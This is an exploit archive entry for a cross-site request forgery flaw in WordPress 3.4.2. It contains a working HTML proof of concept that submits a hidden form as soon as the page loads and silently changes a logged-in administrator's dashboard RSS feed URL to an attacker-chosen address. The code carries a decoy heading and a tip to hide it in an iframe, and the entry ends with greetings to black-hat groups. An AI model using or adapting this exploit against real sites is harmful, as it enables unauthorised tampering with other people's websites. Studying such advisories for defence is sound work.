WordPress 3.4.2 Cross Site Request Forgery

🗓️ 22 Sep 2012 00:00:00Reported by AkaStepType

zdt🔗 0day.today👁 32 Views

WordPress 3.4.2 Cross Site Request Forgery vulnerability in RSS link editin

============================================================
Vulnerable Software: WordPress (Version 3.4.2)
Downloaded from: http://wordpress.org/latest.zip
MD5SUM: (d670508d81e2fd060c2041441bc03300 *wordpress-3.4.2.zip)
===========================================================

Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL:  5.5.27

===========================================================
Vuln Desc: WordPress Version 3.4.2 is vulnerable to Cross Site Request Forgery Vulnerability.
The folloging CSRF exploit will change rss link if the currently logged administrator visits malicious page which containts the exploit below.
============================================================
                                             Proof Of Concept

==================WORDPRESS 3.4.2 CSRF exploit=================
<body onload="javascript:document.forms[0].submit()">
<form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form">
<h1>How Many Girls You Have? xD))</h1>
<!-- Idea for you: Iframe it -->
<input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" />
  
<select id="rss-items-1" name="widget-rss[1][items]">
<option value='1' >1</option>
<option value='2' >2</option>
<option value='3' >3</option><option value='4' >4</option>
<option value='5' >5</option>
<option value='6' >6</option>
<option value='7' >7</option>
<option value='8' >8</option>
<option value='9' >9</option>
<option value='10' >10</option>
<option value='11' >11</option>
<option value='12' >12</option>
<option value='13' >13</option>
<option value='14' >14</option>
<option value='15' >15</option>
<option value='16' >16</option>
<option value='17' >17</option>
<option value='18' >18</option>
<option value='19' >19</option>
<option value='20' selected='selected'>20</option>
</select>
<input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/>
<input type="hidden" name="widget_id" value="dashboard_incoming_links" />
</form>
====================END OF=================================


SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
to all Aa Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep



#  0day.today [2018-01-24]  #

22 Sep 2012 00:00Current

7.1High risk

Vulners AI Score7.1